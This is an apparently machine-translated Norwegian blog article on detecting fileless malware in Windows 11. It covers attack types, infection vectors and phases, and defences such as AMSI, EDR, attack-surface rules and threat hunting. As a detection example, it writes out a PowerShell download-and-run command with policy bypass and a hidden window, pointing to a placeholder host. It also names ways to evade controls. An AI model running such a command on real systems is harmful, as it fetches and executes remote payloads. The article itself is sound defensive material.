- Filløs skadelig programvare opererer i minnet og misbruker legitime prosesser som PowerShell og WMI.
- Effektiv deteksjon krever overvåking av atferd og analyse av minne, ikke bare filer.
- AMSI, prosesstelemetri, regler for overflatereduksjon og proaktiv jakt er viktige funksjoner i Windows 11.
- Vedvarende lagring i WMI, register og MBR, sammen med fastvare og USB, utvider angrepsflaten.
¿Hvordan oppdage farlig filløs skadelig programvare? Aktiviteten av filløse angrep har økt betraktelig, og for å gjøre vondt verre, Windows 11 er ikke immunDenne tilnærmingen omgår disken og er avhengig av minne og legitime systemverktøy; det er derfor signaturbaserte antivirusprogrammer sliter. Hvis du leter etter en pålitelig måte å oppdage det på, ligger svaret i å kombinere telemetri, atferdsanalyse og Windows-kontroller.
I dagens økosystem eksisterer kampanjer som misbruker PowerShell, WMI eller Mshta side om side med mer sofistikerte teknikker som minneinjeksjoner, persistens «uten å berøre» disken, og til og med misbruk av fastvareNøkkelen er å forstå trusselkartet, angrepsfasene og hvilke signaler de etterlater selv når alt skjer i RAM-en.
Hva er filløs skadelig programvare, og hvorfor er det et problem i Windows 11?
Når vi snakker om «filløse» trusler, refererer vi til ondsinnet kode som Du trenger ikke å legge inn nye kjørbare filer i filsystemet for å fungere. Den injiseres vanligvis i kjørende prosesser og kjøres i RAM, avhengig av tolker og binærfiler signert av Microsoft (f.eks. PowerShell, WMI, rundll32, mshtaDette reduserer fotavtrykket ditt og lar deg omgå søkemotorer som bare ser etter mistenkelige filer.
Selv Office-dokumenter eller PDF-filer som utnytter sårbarheter for å starte kommandoer, regnes som en del av fenomenet, fordi aktivere utførelse i minnet uten å legge igjen nyttige binærfiler for analyse. Misbruk av makroer og DDE I Office, siden koden kjører i legitime prosesser som WinWord.
Angripere kombinerer sosial manipulering (phishing, spamlenker) med tekniske feller: brukerens klikk starter en kjede der et skript laster ned og kjører den endelige nyttelasten i minnet, unngå å etterlate spor på disken. Målene spenner fra datatyveri til utførelse av ransomware, til stille sideveis bevegelse.

Typologier etter fotavtrykk i systemet: fra «ren» til hybrider
For å unngå forvirrende konsepter er det nyttig å skille trusler etter graden av interaksjon med filsystemet. Denne kategoriseringen tydeliggjør Hva vedvarer, hvor lever koden, og hvilke spor etterlater den?.
Type I: ingen filaktivitet
Helt filfri skadevare skriver ingenting til disk. Et klassisk eksempel er å utnytte en nettverkssårbarhet (som EternalBlue-vektoren den gang) for å implementere en bakdør som ligger i kjerneminnet (tilfeller som DoublePulsar). Her skjer alt i RAM, og det er ingen artefakter i filsystemet.
Et annet alternativ er å forurense firmware av komponenter: BIOS/UEFI, nettverkskort, USB-periferiutstyr (teknikker av BadUSB-typen) eller til og med CPU-undersystemer. De vedvarer gjennom omstarter og reinstallasjoner, med den ekstra vanskeligheten at Få produkter inspiserer fastvareDette er komplekse angrep, sjeldnere, men farlige på grunn av deres snikhet og holdbarhet.
Type II: Indirekte arkiveringsaktivitet
Her «etterlater» ikke skadevaren sin egen kjørbare fil, men bruker systemadministrerte containere som i hovedsak er lagret som filer. For eksempel bakdører som planter powershell-kommandoer i WMI-depotet og utløse kjøringen med hendelsesfiltre. Det er mulig å installere det fra kommandolinjen uten å slette binærfiler, men WMI-depotet ligger på disk som en legitim database, noe som gjør det vanskelig å rydde uten å påvirke systemet.
Fra et praktisk synspunkt anses de som filløse, fordi den containeren (WMI, register osv.) Det er ikke en klassisk detekterbar kjørbar enhet Og opprydding er ikke triviell. Resultatet: skjult vedvarende med få spor av «tradisjonell» oppførsel.
Type III: Krever filer for å fungere
Noen tilfeller opprettholder en «filløs» persistens På et logisk nivå trenger de en filbasert trigger. Det typiske eksemplet er Kovter: den registrerer et skallverb for en tilfeldig filendelse; når en fil med den filendelsen åpnes, startes et lite skript som bruker mshta.exe, som rekonstruerer den skadelige strengen fra registeret.
Trikset er at disse «agn»-filene med tilfeldige utvidelser ikke inneholder en analyserbar nyttelast, og mesteparten av koden ligger i Registro (en annen container). Det er derfor de er kategorisert som filløse i påvirkning, selv om de strengt tatt er avhengige av én eller flere diskartefakter som en utløser.
Vektorer og «verter» for infeksjon: hvor den kommer inn og hvor den gjemmer seg
For å forbedre deteksjon er det viktig å kartlegge innførselsstedet og verten for infeksjonen. Dette perspektivet bidrar til å utforme spesifikke kontroller Prioriter passende telemetri.
exploits
- Filbasert (Type III): Dokumenter, kjørbare filer, eldre Flash-/Java-filer eller LNK-filer kan utnytte nettleseren eller motoren som behandler dem til å laste inn skallkode i minnet. Den første vektoren er en fil, men nyttelasten går til RAM.
- Nettverksbasert (Type I): En pakke som utnytter en sårbarhet (f.eks. i SMB) oppnår kjøring i brukerlandet eller kjernen. WannaCry populariserte denne tilnærmingen. Direkte minneinnlasting uten ny fil.
maskinvare
- Enheter (Type I): Fastvare på disk eller nettverkskort kan endres og kode introduseres. Vanskelig å inspisere og vedvarer utenfor operativsystemet.
- CPU- og administrasjonsundersystemer (Type I): Teknologier som Intels ME/AMT har vist veier til Nettverk og utførelse utenfor operativsystemetDen angriper på et veldig lavt nivå, med høyt potensial for stealth.
- USB (Type I): BadUSB lar deg omprogrammere en USB-stasjon til å imitere et tastatur eller et nettverkskort og starte kommandoer eller omdirigere trafikk.
- BIOS / UEFI (Type I): ondsinnet omprogrammering av fastvare (tilfeller som Mebromi) som kjører før Windows starter opp.
- Hypervisor (Type I): Implementering av en mini-hypervisor under operativsystemet for å skjule dens tilstedeværelse. Sjelden, men allerede observert i form av hypervisor-rootkits.
Utførelse og injeksjon
- Filbasert (Type III): EXE/DLL/LNK eller planlagte oppgaver som starter injeksjoner i legitime prosesser.
- Makroer (Type III): VBA i Office kan dekode og kjøre nyttelaster, inkludert fullstendig ransomware, med brukerens samtykke gjennom bedrag.
- scripts (Type II): PowerShell, VBScript eller JScript fra fil, kommandolinje, tjenester, registrering eller WMIAngriperen kan skrive skriptet i en ekstern økt uten å berøre disken.
- Oppstartspost (MBR/Oppstart) (Type II): Familier som Petya overskriver oppstartssektoren for å ta kontroll ved oppstart. Den er utenfor filsystemet, men tilgjengelig for operativsystemet og moderne løsninger som kan gjenopprette den.
Hvordan filløse angrep fungerer: faser og signaler
Selv om de ikke etterlater kjørbare filer, følger kampanjene en faseoppdelt logikk. Å forstå dem gjør det mulig å overvåke. hendelser og sammenhenger mellom prosesser som setter spor.
- FørstegangstilgangPhishing-angrep ved bruk av lenker eller vedlegg, kompromitterte nettsteder eller stjålet legitimasjon. Mange kjeder starter med et Office-dokument som utløser en kommando. PowerShell.
- Standhaftighetbakdører via WMI (filtre og abonnementer), Registerkjøringsnøkler eller planlagte oppgaver som starter skript på nytt uten en ny skadelig fil.
- EksfiltreringNår informasjonen er samlet inn, sendes den ut av nettverket ved hjelp av pålitelige prosesser (nettlesere, PowerShell, bitsadmin) for å blande trafikken.
Dette mønsteret er spesielt snikende fordi angrepsindikatorer De gjemmer seg i normalitet: kommandolinjeargumenter, prosesskjedering, anomale utgående tilkoblinger eller tilgang til injeksjons-API-er.
Vanlige teknikker: fra hukommelse til opptak
Skuespillerne er avhengige av en rekke fremgangsmåter som optimaliserer sniking. Det er nyttig å kjenne til de vanligste for å aktivere effektiv deteksjon.
- Beboer til minneLaster nyttelaster inn i området til en klarert prosess som venter på aktivering. rootkits og kroker I kjernen hever de nivået av skjuling.
- Persistens i registeretLagre krypterte blobs i nøkler og rehydrer dem fra en legitim launcher (mshta, rundll32, wscript). Det kortvarige installasjonsprogrammet kan selvdestruere for å minimere fotavtrykket.
- Phishing av legitimasjonVed å bruke stjålne brukernavn og passord, kjører angriperen eksterne skall og planter stille tilgang i registeret eller WMI.
- «Filløs» løsepengevirusKryptering og C2-kommunikasjon er orkestrert fra RAM, noe som reduserer mulighetene for deteksjon inntil skaden er synlig.
- Driftssett: automatiserte kjeder som oppdager sårbarheter og distribuerer minnebaserte nyttelaster etter at brukeren klikker.
- Dokumenter med kodemakroer og mekanismer som DDE som utløser kommandoer uten å lagre kjørbare filer på disk.
Bransjestudier har allerede vist bemerkelsesverdige topper: i en periode i 2018, en økning på over 90 % i skriptbaserte og PowerShell-kjedeangrep, et tegn på at vektoren er foretrukket på grunn av sin effektivitet.
Utfordringen for bedrifter og leverandører: hvorfor blokkering ikke er nok
Det ville være fristende å deaktivere PowerShell eller utestenge makroer for alltid, men Du ville ødelegge operasjonenPowerShell er en pilar i moderne administrasjon, og Office er essensielt i næringslivet; blind blokkering er ofte ikke mulig.
Videre finnes det måter å omgå grunnleggende kontroller på: kjøre PowerShell gjennom DLL-er og rundll32, pakke skript inn i EXE-er, Ta med din egen kopi av PowerShell eller til og med skjule skript i bilder og trekke dem ut i minnet. Derfor kan ikke forsvaret utelukkende baseres på å benekte eksistensen av verktøy.
En annen vanlig feil er å delegere hele avgjørelsen til skyen: hvis agenten må vente på svar fra serveren, Du mister sanntidsforebyggingTelemetridata kan lastes opp for å berike informasjonen, men Avbøtende tiltak må skje ved endepunktet.
Slik oppdager du filløs skadelig programvare i Windows 11: telemetri og oppførsel
Vinnerstrategien er overvåke prosesser og minneIkke filer. Ondsinnet oppførsel er mer stabil enn formene en fil har, noe som gjør dem ideelle for forebyggingsmotorer.
- AMSI (grensesnitt for skanning av skadelig programvare)Den fanger opp PowerShell-, VBScript- eller JScript-skript selv når de er dynamisk konstruert i minnet. Utmerket for å fange opp obfuskerte strenger før kjøring.
- Prosessovervåkingstart/mål, PID, foreldre og barn, ruter, kommandolinjer og hasher, pluss utførelsestrær for å forstå hele historien.
- MinneanalyseDeteksjon av injeksjoner, reflekterende eller PE-belastninger uten å berøre disken, og gjennomgang av uvanlige kjørbare områder.
- Beskyttelse av startsektorenKontroll og gjenoppretting av MBR/EFI i tilfelle manipulering.
I Microsofts økosystem kombinerer Defender for Endpoint AMSI, atferdsovervåkingMinneskanning og skybasert maskinlæring brukes til å skalere deteksjoner mot nye eller obfuskerte varianter. Andre leverandører bruker lignende tilnærminger med kjerneresidente motorer.
Realistisk eksempel på korrelasjon: fra dokument til PowerShell
Tenk deg en kjede der Outlook laster ned et vedlegg, Word åpner dokumentet, aktivt innhold aktiveres og PowerShell startes med mistenkelige parametere. Riktig telemetri ville vise Kommandolinje (f.eks. ExecutionPolicy Bypass, skjult vindu), koble til et uklarert domene og opprette en underprosess som installerer seg selv i AppData.
En agent med lokal kontekst er i stand til å stopp og reverser ondsinnet aktivitet uten manuell inngripen, i tillegg til å varsle SIEM eller via e-post/SMS. Noen produkter legger til et rotårsaksattribusjonslag (StoryLine-type modeller), som ikke peker til den synlige prosessen (Outlook/Word), men til full ondsinnet tråd og dens opprinnelse for å grundig rydde opp i systemet.
Et typisk kommandomønster å se opp for kan se slik ut: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logikk er ikke den eksakte strengen, men settet med signaler: omgåelse av policy, skjult vindu, fjerne nedlastinger og utførelse i minnet.
AMSI, pipeline og rolle for hver aktør: fra endepunktet til SOC
Utover skriptregistrering orkestrerer en robust arkitektur trinn som forenkler etterforskning og respons. Jo mer bevis før lasten utføres, desto bedre.Bedre.
- SkriptavlyttingAMSI leverer innholdet (selv om det genereres underveis) for statisk og dynamisk analyse i en malware-pipeline.
- ProsesshendelserPID-er, binærfiler, hasher, ruter og andre data samles inn. argumenter, og etablerte prosesstrærne som førte til den endelige lasten.
- Deteksjon og rapporteringDeteksjonene vises på produktkonsollen og videresendes til nettverksplattformer (NDR) for visualisering av kampanjer.
- BrukergarantierSelv om et skript injiseres i minnet, rammeverket AMSI avskjærer den i kompatible versjoner av Windows.
- Administratorfunksjoner: policykonfigurasjon for å aktivere skriptinspeksjon, atferdsbasert blokkering og opprette rapporter fra konsollen.
- SOC-arbeidutvinning av artefakter (VM UUID, OS-versjon, skripttype, initiatorprosess og dens overordnede, hasher og kommandolinjer) for å gjenskape historikken og heisregler framtid.
Når plattformen tillater eksport av minnebuffer I forbindelse med henrettelsen kan forskere generere nye deteksjoner og berike forsvaret mot lignende varianter.
Praktiske tiltak i Windows 11: forebygging og jakt

I tillegg til å ha EDR med minneinspeksjon og AMSI, lar Windows 11 deg lukke angrepsområder og forbedre synligheten med innebygde kontroller.
- Registrering og begrensninger i PowerShellAktiverer skriptblokklogging og modullogging, bruker begrensede moduser der det er mulig, og kontrollerer bruken av Omgå/skjult.
- Regler for reduksjon av angrepsflater (ASR)blokkerer skriptstart av Office-prosesser og WMI-misbruk/PSExec når det ikke er nødvendig.
- Makropolicyer for Officedeaktiverer som standard intern makrosignering og strenge tillitslister; overvåker eldre DDE-flyter.
- WMI-revisjon og registerovervåker hendelsesabonnementer og automatiske utførelsesnøkler (Run, RunOnce, Winlogon), samt oppgaveoppretting planlagt.
- Oppstartsbeskyttelseaktiverer sikker oppstart, kontrollerer MBR/EFI-integriteten og validerer at det ikke er noen endringer ved oppstart.
- Lapping og herdinglukker utnyttbare sårbarheter i nettlesere, Office-komponenter og nettverkstjenester.
- bevissthet: trener brukere og tekniske team i phishing og signaler om hemmelige henrettelser.
For jakt, fokuser på spørringer om: oppretting av prosesser av Office mot PowerShell/MSHTA, argumenter med nedlastingsstreng/nedlastingsfilSkript med tydelig obfuskasjon, reflekterende injeksjoner og utgående nettverk til mistenkelige toppnivådomener. Kryssreferer disse signalene med omdømme og frekvens for å redusere støy.
Hva kan hver motor oppdage i dag?
Microsofts bedriftsløsninger kombinerer AMSI, atferdsanalyse, undersøke hukommelsen og beskyttelse av oppstartssektoren, pluss skybaserte maskinlæringsmodeller for å skalere mot nye trusler. Andre leverandører implementerer overvåking på kjernenivå for å skille mellom skadelig og godartet programvare med automatisk tilbakestilling av endringer.
En tilnærming basert på henrettelseshistorier Den lar deg identifisere rotårsaken (for eksempel et Outlook-vedlegg som utløser en kjede) og redusere problemet med hele treet: skript, nøkler, oppgaver og mellomliggende binærfiler, slik at du unngår å bli sittende fast på det synlige symptomet.
Vanlige feil og hvordan unngå dem

Å blokkere PowerShell uten en alternativ administrasjonsplan er ikke bare upraktisk, men det finnes også måter å påkalle det indirekte påDet samme gjelder makroer: enten administrerer du dem med retningslinjer og signaturer, eller så vil bedriften lide. Det er bedre å fokusere på telemetri og atferdsregler.
En annen vanlig feil er å tro at hvitelisting av applikasjoner løser alt: filløs teknologi er nettopp avhengig av dette. pålitelige apperKontrollen bør observere hva de gjør og hvordan de forholder seg, ikke bare om de har lov.
Med alt det ovennevnte slutter filløs skadelig programvare å være et "spøkelse" når du overvåker hva som virkelig betyr noe: atferd, hukommelse og opprinnelse for hver utførelse. Ved å kombinere AMSI, omfattende prosesstelemetri, innebygde Windows 11-kontroller og et EDR-lag med atferdsanalyse får du fordelen. Legg til realistiske policyer for makroer og PowerShell, WMI/registerrevisjon og jakt som prioriterer kommandolinjer og prosesstrær, og du har et forsvar som kutter disse kjedene før de lager lyd.
Lidenskapelig opptatt av teknologi siden han var liten. Jeg elsker å være oppdatert i sektoren og fremfor alt å formidle det. Derfor har jeg vært dedikert til kommunikasjon på teknologi- og videospillnettsteder i mange år. Du kan finne meg skrive om Android, Windows, MacOS, iOS, Nintendo eller andre relaterte emner som du tenker på.